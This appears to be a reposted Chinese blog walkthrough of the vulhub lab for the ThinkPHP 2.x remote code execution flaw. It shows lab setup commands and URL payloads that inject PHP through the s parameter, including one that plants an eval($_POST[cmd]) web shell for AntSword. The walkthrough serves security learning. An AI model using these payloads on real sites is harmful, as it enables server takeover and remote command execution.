当前位置: 首页 > news >正文

vulhub Thinkphp5 2-rce远程代码执行漏洞

news 2025/6/28 2:59:35

1.执行以下命令启动靶场环境并在浏览器访问

cd /vulhub/thinkphp/2-rce #进入漏洞环境所在目录
 
docker-compose up -d #启动靶场
 
docker ps #查看容器信息

2.访问网页

3.构造payload

192.168.157.142:8080?s=/Index/index/L/${@phpinfo()}

4、写入一句话木马,使用蚁剑连接

192.168.157.142:8080/?s=/Index/index/name/${@print(eval($_POST[cmd]))}


http://www.mrgr.cn/news/22074.html

相关文章:

  • C++ STL 数据结构 vector基本用法
  • UnLua调用C++函数
  • 嵌入式秋招面试 学习 面试经验提醒和分享
  • 活期存款类型
  • 物联网之ESP32开发板简介、Arduino
  • 01 Docker概念和部署
  • 【重学 MySQL】十七、比较运算符的使用
  • Python画笔案例-038 绘制齿形图
  • Arch - 架构安全性_认证(Authentication)的标准和实现
  • FreeRTOS-基本介绍和移植STM32
  • 【论文编写】利用在线工具生成表格图片的Latex语句
  • k8s笔记
  • 小白也能看得懂!如何在浏览器插件的文件中合法引入第三方依赖远程代码?
  • 开放式耳机好用?平价开放式耳机推荐?四款开放式的蓝牙耳机推荐
  • vcpkg子包路径批量获取
  • 新160个crackme - 051-Keygenning4newbies
  • 大量数据相似度加速计算
  • 【Spring基础1】- Spring 启示录-理解IoC控制反转
  • NX Unigraphics发展简史及下载
  • 使用ChatGPT润色论文的10大分步技巧,效果立竿见影